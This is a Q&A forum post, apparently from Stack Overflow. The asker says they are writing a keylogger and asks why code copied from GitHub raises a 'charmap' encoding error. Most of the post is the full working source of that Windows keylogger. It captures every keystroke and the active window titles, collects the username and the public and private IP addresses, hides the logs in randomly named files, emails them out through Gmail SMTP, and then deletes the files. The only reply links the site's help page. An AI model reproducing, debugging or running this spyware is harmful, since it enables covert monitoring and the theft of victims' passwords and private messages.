# 'charmap' codec can't encode character '\u25cf' in position 262: character maps to <undefined>

Tags: python

I'm trying to write a keylogger in python and while doing some research
I found this code on github but when I run it I'am having an error and
I want to know what is the probleme
this is the code and I really need to understand this code and Any help will
be very greatfull.
This is the code:

```
from pynput.keyboard import Key,Listener
import win32gui
import os
import time
import requests
import socket
import random
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
import threading
import config


datetime = time.ctime(time.time())
user = os.path.expanduser('~').split('\\')[2]
publicIP = requests.get('https://api.ipify.org/').text
privateIP = socket.gethostbyname(socket.gethostname())

msg = f'[START OF LOGS]\n  *~ Date/Time: {datetime}\n  *~ User-Profile: {user}\n  *~ Public-IP: {publicIP}\n  *~ Private-IP: {privateIP}\n\n'
logged_data = []
logged_data.append(msg)

old_app = ''
delete_file = []


def on_press(key):
    global old_app

    new_app = win32gui.GetWindowText(win32gui.GetForegroundWindow())

    if new_app == 'Cortana':
        new_app = 'Windows Start Menu'
    else:
        pass
    
    
    if new_app != old_app and new_app != '':
        logged_data.append(f'[{datetime}] ~ {new_app}\n')
        old_app = new_app
    else:
        pass


    substitution = ['Key.enter', '[ENTER]\n', 'Key.backspace', '[BACKSPACE]', 'Key.space', ' ',
    'Key.alt_l', '[ALT]', 'Key.tab', '[TAB]', 'Key.delete', '[DEL]', 'Key.ctrl_l', '[CTRL]', 
    'Key.left', '[LEFT ARROW]', 'Key.right', '[RIGHT ARROW]', 'Key.shift', '[SHIFT]', '\\x13', 
    '[CTRL-S]', '\\x17', '[CTRL-W]', 'Key.caps_lock', '[CAPS LK]', '\\x01', '[CTRL-A]', 'Key.cmd', 
    '[WINDOWS KEY]', 'Key.print_screen', '[PRNT SCR]', '\\x03', '[CTRL-C]', '\\x16', '[CTRL-V]']

    key = str(key).strip('\'')
    if key in substitution:
        logged_data.append(substitution[substitution.index(key)+1])
    else:
        logged_data.append(key)


def write_file(count):
    one = os.path.expanduser('~') + '/Downloads/'
    two = os.path.expanduser('~') + '/Pictures/'
    #three = 'C:/'
    list = [one,two]

    filepath = random.choice(list)
    filename = str(count) + 'I' + str(random.randint(1000000,9999999)) + '.txt'
    file = filepath + filename
    delete_file.append(file)


    with open(file,'w') as fp:
        fp.write(''.join(logged_data))
    print('written all good')


def send_logs():
    count = 0

    fromAddr = config.fromAddr
    fromPswd = config.fromPswd
    toAddr = fromAddr

    MIN = 10
    SECONDS = 60
    #time.sleep(MIN * SECONDS) # every 10 mins write file/send log
    time.sleep(30) # for debugging ~ yes program works :)
    while True:
        if len(logged_data) > 1:
            try:
                write_file(count)

                subject = f'[{user}] ~ {count}'

                msg = MIMEMultipart()
                msg['From'] = fromAddr
                msg['To'] = toAddr
                msg['Subject'] = subject
                body = 'testing'
                msg.attach(MIMEText(body,'plain'))

                attachment = open(delete_file[0],'rb')
                print('attachment')

                filename = delete_file[0].split('/')[2]
```

I think this is the place the error is coming from

```
                part = MIMEBase('application','octect-stream')
                part.set_payload((attachment).read())
                encoders.encode_base64(part)
                part.add_header('content-disposition','attachment;filename='+str(filename))
                msg.attach(part)

                text = msg.as_string()
                print('test msg.as_string')

                s = smtplib.SMTP('smtp.gmail.com',587)
                s.ehlo()
                s.starttls()
                print('starttls')
                s.ehlo()
                s.login(fromAddr,fromPswd)
                s.sendmail(fromAddr,toAddr,text)
                print('sent mail')
                attachment.close()
                s.close()

                os.remove(delete_file[0])
                del logged_data[1:]
                del delete_file[0:]
                print('delete data/files')

                count += 1

            except Exception as errorString:
                print('[!] send_logs // Error.. ~ %s' % (errorString))
                pass




if __name__=='__main__':
    T1 = threading.Thread(target=send_logs)
    T1.start()

    with Listener(on_press=on_press) as listener:
        listener.join()
```

Comment: Hi. Please check out https://stackoverflow.com/help/minimal-reproducible-example